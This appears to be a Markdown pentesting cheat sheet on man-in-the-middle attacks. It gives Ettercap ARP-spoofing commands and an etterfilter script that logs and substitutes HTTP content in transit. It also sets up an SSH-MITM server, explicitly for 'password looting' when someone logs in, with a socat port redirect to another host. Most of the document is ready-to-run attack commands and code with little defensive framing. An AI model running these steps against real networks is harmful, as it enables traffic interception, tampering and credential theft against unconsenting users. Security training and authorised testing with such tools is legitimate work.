49 lines
1.2 KiB
Markdown
49 lines
1.2 KiB
Markdown
# Man In the Middle
|
|
|
|
|
|
## Ettercap
|
|
|
|
* [Ettercap](https://www.ettercap-project.org/)
|
|
* [Bettercap](https://www.bettercap.org/)
|
|
|
|
* ARP spoofing via ettercap and read traffic. Press q to reverse to pre mitm arp caches
|
|
```sh
|
|
ettercap -T -i <interface> -M arp
|
|
```
|
|
|
|
* Etterfilter can filter and restructure packets
|
|
```sh
|
|
man etterfilter
|
|
```
|
|
```sh
|
|
if (ip.proto == TCP && tcp.dst == 80 && search(DATA.data, "filename.html") ) {
|
|
log(DATA.data, "/tmp/ettercap.log");
|
|
replace("filename.html", "otherfilename.html" );
|
|
msg("###### ETTERFILTER: substituted 'filename.html' with 'otherfilename.html' ######\n");
|
|
}
|
|
```
|
|
|
|
* Escape double quote inside the payload string
|
|
* compile via
|
|
```sh
|
|
etterfilter filter.ef -o filter.ef
|
|
```
|
|
|
|
* Run the filter via
|
|
```sh
|
|
ettercap -T -i <interface> -M arp -F filter.ef
|
|
```
|
|
|
|
## mitm-server
|
|
|
|
Set up a local Man in the middle server which can be used for example for password looting if somebody logs in.
|
|
[SSH-MITM](https://docs.ssh-mitm.at/#) provides this feature. Therefore, download the package via `pip install ssh-mitm`.
|
|
|
|
Redirect the port to the mitm server and start it afterwards
|
|
|
|
```sh
|
|
((socat TCP4-LISTEN:2222 TCP4:10.10.14.4:10022 &) &)
|
|
|
|
ssh-mitm server --remote-host $TARGET_IP
|
|
```
|